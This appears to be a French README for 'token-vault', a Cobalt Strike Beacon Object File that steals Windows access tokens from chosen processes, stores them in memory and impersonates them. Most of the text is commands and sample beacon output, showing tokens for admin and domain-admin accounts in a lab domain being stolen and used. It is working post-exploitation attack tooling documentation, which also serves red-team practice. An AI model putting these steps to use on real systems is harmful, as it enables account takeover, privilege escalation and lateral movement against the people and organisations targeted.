
# BOF de coffre-fort de jetons en mémoire pour Cobalt Strike
Ce Beacon Object File (BOF) crée un stockage en mémoire pour les jetons d'accès Windows volés/dupliqués et vous permet de :
make all.token-vault.cna dans votre client Cobalt Strike.beacon> help token-vault
Available Commands:
Create a new token vault: token-vault create
Steal and store tokens: token-vault steal <comma separated list of PIDs> [vault-id]
Use the stored token: token-vault use <token-id> [vault-id]
Show the stored tokens: token-vault show [vault-id]
Remove the stored token: token-vault remove <token-id> [vault-id]
Remove all tokens: token-vault remove-all [vault-id]
Set the default token vault: token-vault set <vault-id>
La commande token-vault create alloue un coffre-fort vide depuis le heap du beacon. La sortie reçue contient l'adresse mémoire du coffre-fort (alias vault id), qui est utilisée pour spécifier le coffre-fort pour les autres commandes token-vault.
beacon> token-vault create
[*] Token Vault - create (@henkru)
[+] host called home, sent: 2991 bytes
[+] received output:
token vault created: 0000000000C31610
De plus, un identifiant de coffre-fort spécifique peut être défini comme coffre-fort par défaut, utilisé si une commande token-vault ne contient pas l'identifiant du coffre-fort.
beacon> token-vault set 0000000000C31610
Il est important de noter que les coffres-forts par défaut configurés vivent à l'intérieur du client Cobalt Strike et ne sont pas partagés entre les clients.
La commande token-vault steal duplique les jetons des processus donnés et les stocke dans le coffre-fort.
beacon> token-vault steal 6600,2608,5248
[*] Token Vault - steal (@henkru)
[+] host called home, sent: 3009 bytes
[+] received output:
6600: WINLAB\limited
[+] received output:
2608: WINLAB\limited2
[+] received output:
5248: WINLAB\admin
beacon> token-vault show
[*] Token Vault - show (@henkru)
[+] host called home, sent: 2999 bytes
[+] received output:
5248: WINLAB\admin
2608: WINLAB\limited2
6600: WINLAB\limited
La commande token-vault use emprunte l'identité d'un jeton du coffre-fort. Si le jeton n'existe pas, il sera volé et stocké dans le coffre-fort.
beacon> token-vault use 2608
[*] Token Vault - use (@henkru)
[+] host called home, sent: 3001 bytes
[+] Impersonated WINLAB\limited
beacon> token-vault use 6384
[*] Token Vault - use (@henkru)
[+] host called home, sent: 3001 bytes
[-] token of 6384 not in the vault; try to get it.
[+] received output:
6384: WINLAB\da
[+] Impersonated WINLAB\da
La commande token-vault remove supprime un jeton stocké du coffre-fort.
beacon> token-vault remove 6600
[*] Token Vault - remove (@henkru)
[+] host called home, sent: 3001 bytes
[+] received output:
removed: 6600
De plus, la commande token-vault remove-all supprime tous les jetons d'un coup.